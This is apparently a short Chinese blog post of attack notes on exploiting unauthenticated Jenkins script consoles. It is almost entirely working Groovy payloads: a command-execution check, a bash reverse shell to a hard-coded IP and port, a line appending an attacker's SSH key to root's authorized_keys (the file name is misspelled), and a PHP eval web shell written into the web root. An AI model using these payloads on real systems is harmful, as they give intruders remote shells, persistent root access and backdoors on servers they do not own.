jenkins 未授权利用姿势

#命令执行看权限
println 'whoami'.execute().text
#反弹shell
println 'bash -i >& /dev/tcp/192.168.100.2/4444 0>&1'.execute().text
#上传公钥
println 'echo 公钥内容 >> /root/.ssh/authroized_keys'.execute().text
#上传一句话
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.